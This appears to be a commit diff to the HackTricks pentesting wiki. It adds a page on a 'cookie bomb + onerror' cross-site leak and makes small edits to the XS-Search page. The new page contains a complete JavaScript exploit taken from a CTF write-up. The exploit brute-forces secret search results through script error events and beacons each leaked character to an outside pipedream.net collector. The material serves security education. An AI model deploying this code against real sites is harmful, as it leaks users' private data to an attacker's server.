GitBook: [#3731] No subject

2024-11-21 20:23:18 +00:00 · 2023-01-02 23:15:01 +00:00 · 2023-01-02 23:15:01 +00:00 · fa8a957b55
commit fa8a957b55
parent 40955b95f7
3 changed files with 95 additions and 3 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -582,6 +582,7 @@
 * [XS-Search/XS-Leaks](pentesting-web/xs-search.md)
  * [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
  * [Connection Pool by Destination Example](pentesting-web/xs-search/connection-pool-by-destination-example.md)
+  * [Cookie Bomb + Onerror XS Leak](pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md)
  * [performance.now example](pentesting-web/xs-search/performance.now-example.md)
  * [performance.now + Force heavy task](pentesting-web/xs-search/performance.now-+-force-heavy-task.md)
  * [Event Loop Blocking + Lazy images](pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md)
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search.md
@ -95,7 +95,11 @@ Get Access Today:
 * **Summary**: if trying to load a resource onerror/onload events are triggered with the resource is loaded successfully/unsuccessfully it's possible to figure out the status code.
 * **Code example**: [https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)](https://xsinator.com/testing.html#Event%20Handler%20Leak%20\(Script\))

-The code example try lo l**oad scripts objects from JS**, but **other tags** such as objects, stylesheets, images, audios could be also used. Moreover, it's also possible to inject the **tag directly** and declare the `onload` and `onerror` events inside the tag (instead of injecting it from JS).
+{% content-ref url="xs-search/cookie-bomb-+-onerror-xs-leak.md" %}
+[cookie-bomb-+-onerror-xs-leak.md](xs-search/cookie-bomb-+-onerror-xs-leak.md)
+{% endcontent-ref %}
+
+The code example try lo **load scripts objects from JS**, but **other tags** such as objects, stylesheets, images, audios could be also used. Moreover, it's also possible to inject the **tag directly** and declare the `onload` and `onerror` events inside the tag (instead of injecting it from JS).

 There is also a script-less version of this attack:

@ -710,7 +714,11 @@ As a leak technique, the attacker can use the `window.getComputedStyle` method t
 * **Detectable Difference**: Page Content
 * **More info**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
 * **Summary:** Detect if the `:visited` style is applied to an URL indicating it was already visited
-* **Code Example**:
+* **Code Example**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
+
+{% hint style="info" %}
+According to [**this**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/), this is not working in headless Chrome.
+{% endhint %}

 Using the CSS [`:visited`](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited) selector, it’s possible to apply a different style for URLs that have been visited.\
 Previously it was possible to use [`getComputedStyle()`](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle) to detect this difference but now browsers prevent this by always returning values as if the link was visited and limiting what styles can be applied using the selector.\
@ -767,7 +775,8 @@ This is why this technique is interesting: Chrome now has **cache partitioning**

 If a site `example.com` includes a resource from `*.example.com/resource` then that resource will have the **same caching key** as if the resource was directly **requested through top-level navigation**. That is because the caching key is consisted of top-level _eTLD+1_ and frame _eTLD+1_.

-Before accessing the cache is faster than loading a resource, it's possible to try to change the location of a page and cancel it 20ms (for example) after. If the origin was changed after the stop, it means that the resource was cached.
+Because accessing the cache is faster than loading a resource, it's possible to try to change the location of a page and cancel it 20ms (for example) after. If the origin was changed after the stop, it means that the resource was cached.\
+Or could just **send some fetch to the pontentially cached page and measure the time it takes**.

 ### Manual Redirect <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>

--- a/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
+++ b/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
@ -0,0 +1,82 @@
+# Cookie Bomb + Onerror XS Leak
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) is exploiting a functionality that allows the user to **insert any amount of cookies**, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, **too large to handle by the server so return an error http status code**. If the search fails, nothing will happen because URL is short.
+
+```html
+<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
+<script>
+    const $ = document.querySelector.bind(document);
+    const sleep = (ms) => new Promise(r => setTimeout(r, ms));
+    let i = 0;
+    const stuff = async (len=3500) => {
+        let name = Math.random();
+        $("form").target = name;
+        let w = window.open('', name);
+        $("#f").value = "_".repeat(len);
+        $("#f").name = i++;
+        $("form").submit();
+        await sleep(100);
+    };
+    const isError = async (url) => {
+        return new Promise(r => {
+            let script = document.createElement('script');
+            script.src = url;
+            script.onload = () => r(false);
+            script.onerror = () => r(true);
+            document.head.appendChild(script);
+        });
+    }
+    const search = (query) => {
+        return isError("https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query));
+    };
+    const alphabet = "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ";
+    const url = "//en4u1nbmyeahu.x.pipedream.net/";
+    let known = "actf{";
+    window.onload = async () => {
+        navigator.sendBeacon(url + "?load");
+        await Promise.all([stuff(), stuff(), stuff(), stuff()]);
+        await stuff(1600);
+        navigator.sendBeacon(url + "?go");
+        while (true) {
+            for (let c of alphabet) {
+                let query = known + c;
+                if (await search(query)) {
+                    navigator.sendBeacon(url, query);
+                    known += c;
+                    break;
+                }
+            }
+        }
+    };
+</script>
+```
+
+
+
+
+
+
+
+<details>
+
+<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>